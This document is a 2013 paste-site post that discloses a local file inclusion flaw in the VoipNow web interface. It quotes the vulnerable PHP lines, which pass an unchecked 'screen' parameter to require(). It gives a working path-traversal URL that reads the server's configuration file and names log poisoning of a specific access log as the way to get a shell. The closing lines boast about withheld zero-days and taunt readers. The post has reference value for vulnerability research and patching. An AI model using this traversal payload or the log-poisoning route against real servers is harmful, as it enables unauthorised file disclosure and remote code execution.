VoipNow <= 2.5 - Local File Inclusion Vulnerability

SUBMITTED BY: Guest

DATE: Nov. 24, 2013, 11:56 p.m.

FORMAT: Text only

SIZE: 1.1 kB

Raw Download

HITS: 1959

Report
  1. /*
  2. + Application : Voipnow
  3. | Version , Perior to 2.5.0
  4. | Download : http://4psa.com/
  5. | By Faris , AKA i-Hmx
  6. | n0p1337@gmail.com
  7. + sec4ever.com , 1337s.cc
  8. */
  10. VoipNow is commercial web GUI voip server manager,
  11. it's affected by local file inclusion vuln
  12. File : /usr/local/voipnow/admin/htdocs/help/index.php
  14. Line 832
  15. if ( !( isset( $_GET['screen'] ) && trim( $_GET['screen'] ) != "" ) )
  16. {
  17. exit( );
  18. }
  20. Line 872
  21. require( $help_path.trim( $_GET['screen'] ) );
  23. Example : https://target/help/index.php?screen=../../../../../../../../etc/voipnow/voipnow.conf
  25. can be exploited to gain shell access to the server via infecting Logs which located at
  26. /usr/local/voipnow/admin/logs/access.log
  28. NP : Sorry Guys for the time you wasted tracing my Elastix Logs ;)
  29. But The 0day Remain 0day till i decide to dislose it by my own xD
  30. and again Enjoy the song : http://www.youtube.com/watch?v=d-ELnDPmI8w
  31. keep in Your skiddy minds , "I Ain't Mad At Cha"
  32. < Faris , The Awsome xD >
comments powered by Disqus